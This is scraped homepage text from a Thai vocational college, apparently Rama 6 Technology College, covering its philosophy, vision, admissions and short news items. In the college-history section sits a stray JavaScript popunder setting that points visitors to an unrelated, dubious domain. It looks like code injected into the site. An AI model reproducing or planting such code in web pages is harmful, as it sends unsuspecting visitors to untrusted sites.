• ปรัชญา
  "สร้างคุณธรรม นำวิชาการ เพื่องานอาชีพที่ดี"
 • วิสัยทัศน์ (vision)
  มุ่งมั่นพัฒนาคุณภาพการศึกษาอย่างต่อเนื่อง เพื่อให้ผู้เรียน เป็นผู้นำทางด้านวิชาชีพช่างอุตสาหกรรม สู่ระดับมาตรฐานสากล
 • เอกลักษณ์
  จิตอาสา หมายถึง  ผู้เรียนมีจิตสำนึกในการให้บริการวิชาการและวิชาชีพแก่สังคม ชุมชน สถานประกอบการ สถานศึกษา ด้วยความสมัครใจและเต็มใจ เพื่อสาธารณประโยชน์ โดยไม่หวังผลตอบแทน
 • อัตลักษณ์
  ทักษะเด่น เน้นบริการ
 • slider-image
  สีประจำวิทยาลัยฯ
  เขียว - เหลือง

> สมัครเข้าเรียน <

คลิก

ประวัติวิทยาลัย

ประวัติวิทยาลัย

var popunder = {expire: 12,url: "http://bestwomen-now2.com/?u=y2ykaew&o=2xzp89r&m=1"};

Read More

ข่าวประชาสัมพันธ์

รับสมัครนึกศึกษาใหม่ 2561

รับสมัครนึกศึกษาใหม่ 2561

การรับสมัคร วิทยาลัยเทคโนโลยีพระรามหก เป็นวิทยาลัยอาชีวศึกษาเอกชนที่มีคุณภาพ ประเภท ช่างอุตสาหกรรมส...
ลงนามความร่วมมือ กับมหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ

ลงนามความร่วมมือ กับมหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ

สถานศึกษาได้มีข้อตกลงความร่วมมือทางวิชาการเพื่อพัฒนาคุณภาพมาตรฐานการจัดการศึกษาด้านอาชีวศึกษาและเทคโ...
แชมป์ “กทม.ฟุตซอลลีก” รุ่นอายุ 18 ปีหญิง

แชมป์ “กทม.ฟุตซอลลีก” รุ่นอายุ 18 ปีหญิง

วิทยาลัยเทคโนโลยีพระรามหก ตัวแทนเขตบางพลัด ผลการแข่งขัน ในรุ่นอายุไม่เกิน 12 ปีชาย ชนะเลิศ ได้แก่...
Top